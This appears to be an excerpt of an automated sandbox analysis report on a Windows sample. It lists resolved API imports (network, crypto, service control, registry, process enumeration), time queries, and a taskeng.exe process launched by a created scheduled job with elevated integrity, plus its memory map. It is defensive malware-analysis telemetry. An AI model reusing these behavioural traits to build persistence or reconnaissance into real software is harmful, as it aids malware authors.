Get Address	c:\windows\syswow64\wininet.dll	function = HttpQueryInfoW, address_out = 0x75c05c75	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x75bfab49	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenW, address_out = 0x75c09197	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlW, address_out = 0x75c5be5c	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x75c230f1	1	Fn
Get Address	c:\windows\syswow64\winmm.dll	function = timeGetTime, address_out = 0x752326e0	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindExtensionW, address_out = 0x75cfa1b9	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFindFileNameW, address_out = 0x75cfbb71	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsA, address_out = 0x75d1ad1a	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendW, address_out = 0x75cf81ef	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathRemoveFileSpecW, address_out = 0x75cf3248	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathAppendA, address_out = 0x75ced65e	1	Fn
Get Address	c:\windows\syswow64\shlwapi.dll	function = PathFileExistsW, address_out = 0x75cf45bf	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatW, address_out = 0x75a4f481	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatW, address_out = 0x75a534d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesW, address_out = 0x75ab425f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLCID, address_out = 0x75a33da5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocale, address_out = 0x75a4ce46	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoW, address_out = 0x75a33c42	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x75a35223	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileSize, address_out = 0x75a3196e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75a34435	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75a317d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenA, address_out = 0x75a35a4b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetErrorMode, address_out = 0x75a31b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75a3103d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryW, address_out = 0x75a34259	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForSingleObject, address_out = 0x75a31136	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalDrives, address_out = 0x75a35371	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteFile, address_out = 0x75a31282	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDriveTypeA, address_out = 0x75a4ef75	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75a31986	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x75a3588e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemDirectoryW, address_out = 0x75a35063	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WideCharToMultiByte, address_out = 0x75a3170d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryW, address_out = 0x75a3492b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Sleep, address_out = 0x75a310ff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileW, address_out = 0x75a5830d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageW, address_out = 0x75a34620	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpynW, address_out = 0x75a5d556	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75a33ed3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75a33f5c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatA, address_out = 0x75a52b7a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcmpW, address_out = 0x75a35929	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MultiByteToWideChar, address_out = 0x75a3192e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrlenW, address_out = 0x75a31700	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75a311c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetLastError, address_out = 0x75a311a9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcAddress, address_out = 0x75a31222	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x75a49af0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalAlloc, address_out = 0x75a3168c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventW, address_out = 0x75a3183e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcatW, address_out = 0x75a5828e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75a354ee	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75a31410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75a389b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LocalFree, address_out = 0x75a32d3c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringW, address_out = 0x75a33bca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetPriorityClass, address_out = 0x75a4cf28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcess, address_out = 0x75a31809	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetComputerNameW, address_out = 0x75a3dd0e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetExitCodeProcess, address_out = 0x75a4174d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75a34950	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x75a35558	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x75a34c6b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersion, address_out = 0x75a34467	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessId, address_out = 0x75a311f8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x75a334d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileA, address_out = 0x75a353c6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateDirectoryA, address_out = 0x75a5d526	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyA, address_out = 0x75a52a9d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FatalAppExitA, address_out = 0x75ab4691	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreW, address_out = 0x75a4ca5a	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleW, address_out = 0x75a334b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount, address_out = 0x75a3110c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsFree, address_out = 0x75a33587	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsSetValue, address_out = 0x75a314fb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsGetValue, address_out = 0x75a311e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TlsAlloc, address_out = 0x75a349ad	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionAndSpinCount, address_out = 0x75a31916	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetUnhandledExceptionFilter, address_out = 0x75a387c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = UnhandledExceptionFilter, address_out = 0x75a5772f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeEnvironmentStringsW, address_out = 0x75a351cb	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentStringsW, address_out = 0x75a351e3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetSystemTimeAsFileTime, address_out = 0x75a33509	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryPerformanceCounter, address_out = 0x75a31725	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStartupInfoW, address_out = 0x75a34d40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x778845f5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileType, address_out = 0x75a33531	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RaiseException, address_out = 0x75a358a6	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringW, address_out = 0x75a317b9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleCP, address_out = 0x75ad7bff	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetConsoleMode, address_out = 0x75a31328	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointerEx, address_out = 0x75a4c807	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleCtrlHandler, address_out = 0x75a38a09	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibrary, address_out = 0x75a334c8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryExW, address_out = 0x75a3495d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OutputDebugStringW, address_out = 0x75a5d1d4	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77891f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = RtlUnwind, address_out = 0x75a5d1c3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetStdHandle, address_out = 0x75ab454f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapFree, address_out = 0x75a314c9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x7787e026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WriteConsoleW, address_out = 0x75a57aca	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushFileBuffers, address_out = 0x75a3469b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStringTypeW, address_out = 0x75a31946	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77872270	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x778722b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSize, address_out = 0x77883002	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetStdHandle, address_out = 0x75a351b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = AreFileApisANSI, address_out = 0x75ab40d1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleHandleExW, address_out = 0x75a34a6f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ExitProcess, address_out = 0x75a37a10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetProcessHeap, address_out = 0x75a314e9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThreadId, address_out = 0x75a31450	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentThread, address_out = 0x75a317ec	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidCodePage, address_out = 0x75a34493	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetACP, address_out = 0x75a3179c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetOEMCP, address_out = 0x75a5d1a1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75a35189	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75a34a5d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = lstrcpyW, address_out = 0x75a53102	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75a35235	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x75709abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x757088f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = BeginPaint, address_out = 0x75711361	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x75707809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x7570b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x75710dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x75707136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x75708a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x75713559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x778825dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x757105ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x75708bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x7575fd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x7570787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x75709a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EndPaint, address_out = 0x75711341	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x75709679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x757078e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x75b4369c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x75b3df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x75b4157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x75b3df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x75b414d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x75b4469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x75b3df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x75b3ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x75b3ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x75b57144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x75b4468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x75b3df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x75b42a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x75b446ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x75b3e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x75b3df7e	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x767017bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x766fe141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x76689ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x768b7078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76691e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x7555b636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75567259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x755886d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75589d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x75f6fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x75f64642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x75f63eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x75f63ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x75f63e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x75f63f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x75f65dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x75f64af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x75219263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x764cb131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x764c311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x764d7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x751b436b	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x751c572c	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x7510c544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75a34d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x75ab410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75ab4195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x75a3d31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75a4ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7789441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x778bc50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x778bc381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75a4f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x778a05d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x778bca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77870b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7792fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x778c1e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x75ab4761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x75aacd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x75ab424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x75ab46b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x75ac6676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75ab4751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x75ac65f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x75ab47c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x75ab47e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ab47f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75a4eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathW, address_out = 0x766f5708	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x76421544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x76421408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x7642152c	1	Fn

System (5)

Operation	Additional Information	Count	Logfile
Get Time	type = System Time, time = 2018-11-19 13:56:01 (UTC)	1	Fn
Get Time	type = Ticks, time = 95191	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:56:02 (UTC)	1	Fn
Get Info	type = Operating System	1	Fn
Get Info	type = Operating System	1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Process #2: taskeng.exe

Information	Value
ID	#2
File Name	c:\windows\system32\taskeng.exe
Command Line	taskeng.exe {CD671DAD-4B74-4170-B439-24634829D136} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:40, Reason: Created Scheduled Job
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:23
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x59c
Parent PID	0x374 (c:\windows\system32\svchost.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 61C 0x 5F4 0x 5F0 0x 5B4 0x 5A8 0x 5A0 0x 99C

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c1fff	Pagefile Backed Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rw	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rw	-
pagefile_0x00000000000f0000	0x000f0000	0x000f0fff	Pagefile Backed Memory	r	-
private_0x0000000000100000	0x00100000	0x0010ffff	Private Memory	rw	-
private_0x0000000000110000	0x00110000	0x0018ffff	Private Memory	rw	-
private_0x00000000001b0000	0x001b0000	0x002affff	Private Memory	rw	-
private_0x00000000002b0000	0x002b0000	0x003affff	Private Memory	rw	-
pagefile_0x00000000003b0000	0x003b0000	0x00537fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000540000	0x00540000	0x006c0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000006d0000	0x006d0000	0x01acffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001ad0000	0x01ad0000	0x01ec2fff	Pagefile Backed Memory	r	-
private_0x0000000001ed0000	0x01ed0000	0x01fcffff	Private Memory	rw	-
private_0x0000000001fd0000	0x01fd0000	0x0204ffff	Private Memory	rw	-
private_0x0000000002060000	0x02060000	0x020dffff	Private Memory	rw	-
private_0x0000000002210000	0x02210000	0x0228ffff	Private Memory	rw	-
sortdefault.nls	0x02290000	0x0255efff	Memory Mapped File	r	-
private_0x00000000025a0000	0x025a0000	0x0261ffff	Private Memory	rw	-
private_0x0000000002640000	0x02640000	0x026bffff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x027fffff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x028bffff	Private Memory	rw	-
pagefile_0x00000000028c0000	0x028c0000	0x0299efff	Pagefile Backed Memory	r	-
private_0x0000000002a10000	0x02a10000	0x02a8ffff	Private Memory	rw	-
user32.dll	0x77450000	0x77549fff	Memory Mapped File	rwx	-
kernel32.dll	0x77550000	0x7766efff	Memory Mapped File	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
taskeng.exe	0xffcf0000	0xffd63fff	Memory Mapped File	rwx	-
tschannel.dll	0x7fef7bb0000	0x7fef7bb8fff	Memory Mapped File	rwx	-
ktmw32.dll	0x7fefab80000	0x7fefab89fff	Memory Mapped File	rwx	-
xmllite.dll	0x7fefbaa0000	0x7fefbad4fff	Memory Mapped File	rwx	-
dwmapi.dll	0x7fefbae0000	0x7fefbaf7fff	Memory Mapped File	rwx	-
uxtheme.dll	0x7fefbf10000	0x7fefbf65fff	Memory Mapped File	rwx	-
rsaenh.dll	0x7fefcbb0000	0x7fefcbf6fff	Memory Mapped File	rwx	-
cryptsp.dll	0x7fefceb0000	0x7fefcec6fff	Memory Mapped File	rwx	-
wevtapi.dll	0x7fefd0e0000	0x7fefd14cfff	Memory Mapped File	rwx	-
sspicli.dll	0x7fefd480000	0x7fefd4a4fff	Memory Mapped File	rwx	-
cryptbase.dll	0x7fefd4b0000	0x7fefd4befff	Memory Mapped File	rwx	-
rpcrtremote.dll	0x7fefd5a0000	0x7fefd5b3fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefd920000	0x7fefd98afff	Memory Mapped File	rwx	-
msvcrt.dll	0x7fefdb10000	0x7fefdbaefff	Memory Mapped File	rwx	-
oleaut32.dll	0x7fefdbb0000	0x7fefdc86fff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdc90000	0x7fefdcf6fff	Memory Mapped File	rwx	-
usp10.dll	0x7fefdd00000	0x7fefddc8fff	Memory Mapped File	rwx	-
ole32.dll	0x7fefddf0000	0x7fefdff2fff	Memory Mapped File	rwx	-
clbcatq.dll	0x7fefe000000	0x7fefe098fff	Memory Mapped File	rwx	-
msctf.dll	0x7fefe0a0000	0x7fefe1a8fff	Memory Mapped File	rwx	-
sechost.dll	0x7fefe330000	0x7fefe34efff	Memory Mapped File	rwx	-
lpk.dll	0x7fefe350000	0x7fefe35dfff	Memory Mapped File	rwx	-
shlwapi.dll	0x7feff2e0000	0x7feff350fff	Memory Mapped File	rwx	-
advapi32.dll	0x7feff740000	0x7feff81afff	Memory Mapped File	rwx	-
rpcrt4.dll	0x7feff820000	0x7feff94cfff	Memory Mapped File	rwx	-
imm32.dll	0x7feff950000	0x7feff97dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7feff990000	0x7feff990fff	Memory Mapped File	rwx	-
private_0x000007fffffae000	0x7fffffae000	0x7fffffaffff	Private Memory	rw	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
